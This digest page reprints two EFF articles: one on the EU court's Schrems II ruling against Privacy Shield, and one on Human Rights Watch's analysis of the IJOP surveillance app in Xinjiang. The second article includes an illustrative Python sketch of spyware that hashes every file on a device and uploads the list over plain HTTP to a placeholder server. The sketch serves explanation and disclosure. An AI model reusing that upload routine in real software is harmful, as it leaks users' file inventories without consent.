Summary

Total Articles Found: 2

Top Articles:

  • EU Court Again Rules That NSA Spying Makes U.S. Companies Inadequate for Privacy
  • Human Rights Watch Reverse-Engineers Mass Surveillance App Used by Police in Xinjiang

EU Court Again Rules That NSA Spying Makes U.S. Companies Inadequate for Privacy

Published: 2020-07-16 22:37:44

Popularity: 2396

Author: Danny O'Brien

Keywords:

  • Commentary
  • Surveillance and Human Rights
  • NSA Spying
  • International
  • EU Policy
The European Union’s highest court today made clear—once again—that the US government’s mass surveillance programs are incompatible with the privacy rights of EU citizens. The judgment was made in the latest case involving Austrian privacy advocate and EFF Pioneer Award winner Max Schrems. It invalidated the “Privacy Shield,” the data protection deal that secured the transatlantic data flow, and narrowed the ability of companies to transfer data using individual agreements (Standard Contractual Clauses, or SCCs). Despite the many “we are disappointed” statements by the EU Commission, U.S. government officials, and businesses, it should come as no surprise, since it follows the reasoning the court laid out in Schrems’ previous case, in 2015.

Back then, the EU Court of Justice (CJEU) noted that European citizens had no real recourse in US law if their data was swept up in the U.S. government’s surveillance schemes. Such a violation of their basic privacy rights meant that U.S. companies could not provide an “adequate level of [data] protection,” as required by EU law and promised by the EU/U.S. “Privacy Safe Harbor” self-regulation regime. Accordingly, the Safe Harbor was deemed inadequate, and data transfers by companies between the EU and the U.S. were forbidden.

Since that original decision, multinational companies, the U.S. government, and the European Commission have sought to paper over the giant gaps between U.S. spying practices and the EU’s fundamental values. The U.S. government made clear that it did not intend to change its surveillance practices, nor push for legislative fixes in Congress. All parties instead agreed to merely fiddle around the edges of transatlantic data practices, reinventing the previous Safe Harbor agreement, which weakly governed corporate handling of EU citizens’ personal data, under a new name: the EU-U.S. Privacy Shield.
EFF, along with the rest of civil society on both sides of the Atlantic, pointed out that this was just shuffling chairs on the Titanic. The Court cited government programs like PRISM and Upstream as its primary reason for ending data flows between Europe and the United States, not the (admittedly woeful) privacy practices of the companies themselves. That meant that it was entirely in the government and U.S. Congress’ hands to decide whether U.S. tech companies are allowed to handle European personal data. The message to the U.S. government is simple: Fix U.S. mass surveillance, or undermine one of the United States’ major industries.

Five years after the original iceberg of Schrems 1, Schrems 2 has pushed the Titanic fully beneath the waves. The new judgment explicitly calls out the weaknesses of U.S. law in protecting non-U.S. persons from arbitrary surveillance, highlighting that:

    Section 702 of the FISA does not indicate any limitations on the power it confers to implement surveillance programmes for the purposes of foreign intelligence or the existence of guarantees for non-US persons potentially targeted by those programmes.

and:

    ... neither Section 702 of the FISA, nor E.O. 12333, read in conjunction with PPD‑28, correlates to the minimum safeguards resulting, under EU law, from the principle of proportionality, with the consequence that the surveillance programmes based on those provisions cannot be regarded as limited to what is strictly necessary.

The CJEU could not be more blunt in its pronouncements, but it remains unclear how the various actors that could fix this problem will react. Will EU data protection authorities step up their enforcement activities and invalidate SCCs that authorize data flows to the U.S. for failing to protect EU citizens from U.S. mass surveillance programs? And if U.S. corporations cannot confidently rely on either SCCs or the defunct Privacy Shield, will they lobby harder for real U.S. legislative change to protect the privacy rights of Europeans in the U.S., or just find another temporary stopgap to force yet another CJEU decision? And will the European Commission move from defending the status quo and current corporate practices to truly acting on behalf of its citizens?

Whatever the initial reaction by EU regulators, companies, and the Commission, the real solution lies, as it always has, with the United States Congress. Today’s decision is yet another significant indicator that the U.S. government’s foreign intelligence surveillance practices need a massive overhaul. Congress half-heartedly began the process of improving some parts of FISA earlier this year—a process which now appears to have been abandoned. But this decision shows, yet again, that the U.S. needs much broader, privacy-protective reform, and that Congress’ inaction makes us all less safe, wherever we are.


Human Rights Watch Reverse-Engineers Mass Surveillance App Used by Police in Xinjiang

Published: 2019-05-08 00:52:16

Popularity: 1251

Author: Gennie Gebhart

Keywords:

  • Technical Analysis
  • International
  • Surveillance and Human Rights
For years, Xinjiang has been a testbed for the Chinese government’s novel digital and physical surveillance tactics, as well as human rights abuses. But there is still a lot that the international human rights community doesn’t know, especially when it comes to post-2016 Xinjiang. Last Wednesday, Human Rights Watch released a report detailing the inner workings of a mass surveillance app used by police and other officials. Officials use the application to communicate with the larger Integrated Joint Operations Platform (IJOP), the umbrella system for collecting mass surveillance data in Xinjiang.

This report uncovers what a modern surveillance state looks like, and can inform our work to end them. First, the report demonstrates that IJOP’s system of pervasive surveillance targets just about anyone who deviates from an algorithmically determined norm. Second, as a result, IJOP requires a massive amount of manual labor, all focused on data entry and translating the physical world into digital relationships. We stand by Human Rights Watch in calling for an end to violations of human rights within Xinjiang, and within China.

What’s going on in Xinjiang?

Xinjiang is the largest province in China, home to the Uighurs and other Turkic minority groups. Since 2016, the Chinese government has cracked down on the region as part of the ongoing “Strike Hard” campaign. An estimated 1 million individuals have been detained in “political education centers,” and the IJOP’s surveillance system watches the daily lives of Xinjiang residents. While we fight the introduction and integration of facial recognition and street-level surveillance technologies in the U.S., existing research from Human Rights Watch gives us insight into how facial-recognition-enabled cameras already line the streets in front of schools, markets, and homes in Kashgar.
WiFi sniffers log the unique addresses of connected devices, and police gather data from phone inspections, regular intrusive home visits, and mandatory security checkpoints. Human Rights Watch obtained a copy of a mobile app police officers and other officials use to log information about individuals, and released its source code. The primary purpose of the IJOP app is for police officers to record and complete “investigative missions,” which require officers to interrogate certain individuals or investigate vehicles and events, and log the interactions into the app. In addition, the application contains functionality to search for information about an individual, perform facial recognition via Face++, and detect and log information about WiFi networks within range.

Who are they targeting?

Well, basically everyone. The application focuses on individuals who fit one of 36 suspicious “Person Types.” These categories, and the nature of these “investigative missions,” reveal a great deal about the types of people IJOP is targeting. When conducting an “investigation,” officers are prompted to create an extensive profile of the individual(s) being investigated. Despite the Chinese government’s claim that its surveillance state is necessary for countering “separatism, terrorism, and extremism,” most of these behavioral personas have nothing to do with any of the above:

People who travel. This includes individuals who move in or out of their area of residence often, people who have been abroad, or people who have simply left Xinjiang province—even if they did so legally. If an individual has been abroad “for too long,” officials are also prompted to physically check the target’s phone. They’re prompted by the app to search for specific foreign messaging apps (including WhatsApp, Viber, and Telegram), “unusual” software that few people use, VPNs, and whether the target’s browser history contains “harmful URLs.”

People with “problematic” content and software on their phones.
When “suspicious” software (again, including VPNs or foreign messaging apps like WhatsApp or Telegram) is detected, the IJOP system sends a detailed alert to officials about the target, along with identifying information about the phone, including a unique device identifier and metadata that can be used to track the phone’s general location. This could be tied to the JingWang spyware app many residents are forced to install. Reverse-engineering work from Red Team Lab found that JingWang focuses on inspecting the files stored on the device, and transmits a list of filenames and hashes to a server over an insecure HTTP connection.

People, phones, or cars that go “off-the-grid.” This could mean an individual has stopped using a smartphone, or lent a car to a friend. An individual’s ID going “off-grid” typically means they have left Xinjiang and are no longer in IJOP’s jurisdiction of dragnet surveillance, generally due to school, moving (legally), or tourism.

People who are related to any of the above. Following the disappearance and subsequent reappearance of poet and musician Abdurehim Heyit, the international Uyghur diaspora started an online activism campaign and reported thousands of missing relatives. The strong focus on relatives and familial ties in the IJOP data profiles confirms Chinese surveillance’s focus on suspecting, interrogating, and even detaining individuals just because they are related to someone who has been deemed “suspicious.”

...And people who are not. The application flags all sorts of people: people who consume too much electricity, people subject to a data entry mishap, people who do not socialize with neighbors, people who have too many children... the list goes on and on.

Despite grandiose claims, the process is still manual and labor-intensive

Any small deviation from what the IJOP system deems “normal behavior” could be enough to trigger an investigation and prompt a series of intrusive visits from a police officer.
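The JingWang behavior described above, enumerating files on the device and shipping a list of filename/hash pairs to a server over unencrypted HTTP, can be sketched roughly as follows. This is an illustration of the reported pattern, not the app's actual code: the server URL, JSON field names, and choice of MD5 as the hash are assumptions.

```python
# Rough sketch of the file-inventory behavior attributed to JingWang:
# walk the filesystem, record each file's name and hash, and upload the
# list over plain HTTP. URL, field names, and MD5 are assumptions.
import hashlib
import json
import urllib.request
from pathlib import Path


def inventory(root):
    """Collect {"name", "hash"} records for every file under `root`."""
    records = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            digest = hashlib.md5(path.read_bytes()).hexdigest()
            records.append({"name": path.name, "hash": digest})
    return records


def upload(records, url="http://example.invalid/report"):
    # Plain HTTP: the payload travels in cleartext, so it can be read or
    # tampered with by any on-path observer -- the transport weakness the
    # reverse-engineering work called out.
    req = urllib.request.Request(
        url,
        data=json.dumps(records).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    return urllib.request.urlopen(req)
```

Even before considering what the server does with the list, the cleartext transport alone exposes the full file inventory of every monitored phone to anyone on the network path.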
As a result, the current surveillance system is extremely labor-intensive due to the broad categorizations of “suspicious persons” and the raw number of officials needed to keep tabs on all of them. Officers, under severe pressure themselves to perform, overwork themselves feeding data to IJOP. According to Human Rights Watch:

    These officials are under tremendous pressure to carry out the Strike Hard Campaign. Failure to fulfill its requirements can be dangerous, especially for cadres from ethnic minorities, because the Strike Hard Campaign also targets and detains officials thought to be disloyal.

The process of logging all this data is manual; the app itself uses a simple decision tree to decide what bits of information an official should log. According to Human Rights Watch, although the application itself isn’t as sophisticated as the Chinese government has previously touted, it’s still not clear exactly what sort of analyses IJOP may be doing with this massive trove of personal data and behavior.

IJOP’s focus on data entry and translating physical relationships into discrete data points reminds us that digitizing our lives is the first step toward creating a surveillance state. Some parts of the application depend on already-catalogued information: the centralized collection of electricity usage, for instance. Others are intended to collect as much as possible to be used elsewhere. In Xinjiang, the police know a huge array of invasive information about you, and it is their job to collect more. And as all behavior is pulled into the state’s orbit, ordinary people can become instant suspects, and innocent actions have to be rigorously monitored. Using certain software becomes, if not a crime, then a reason for suspicion. Wandering from algorithmic expectations targets you for further investigation. Invoking the “slippery slope” is a misnomer, because the privacy violations we predict and fear are already here.
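Human Rights Watch describes the app's data-entry logic as a simple decision tree: the answer an official gives at each step determines which fields the app prompts for next. A minimal sketch of that pattern, with the questions and field names invented for illustration (the real app's tree is far larger and is not public in this form):

```python
# Minimal sketch of decision-tree-driven data entry, the pattern Human
# Rights Watch describes in the IJOP app. Questions and field names here
# are invented for illustration only.
DECISION_TREE = {
    "question": "Has the person been abroad?",
    "yes": {
        "fields": ["countries_visited", "duration_abroad"],
        "next": {
            "question": "Was the trip longer than the permitted period?",
            "yes": {"fields": ["phone_inspection_result"], "next": None},
            "no": {"fields": [], "next": None},
        },
    },
    "no": {"fields": ["current_address"], "next": None},
}


def fields_to_log(node, answers):
    """Walk the tree with a sequence of "yes"/"no" answers and return
    every field an official would be prompted to fill along that path."""
    fields = []
    for answer in answers:
        branch = node[answer]
        fields.extend(branch["fields"])
        node = branch["next"]
        if node is None:
            break
    return fields
```

The point of the sketch is that there is no analysis happening on the device: the tree only decides which blanks a human must fill in, which is exactly why the system needs so much manual labor.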
Groups like Human Rights Watch, including their brave colleagues within Xinjiang, are doing everyone a service by exposing what a modern surveillance state looks like.
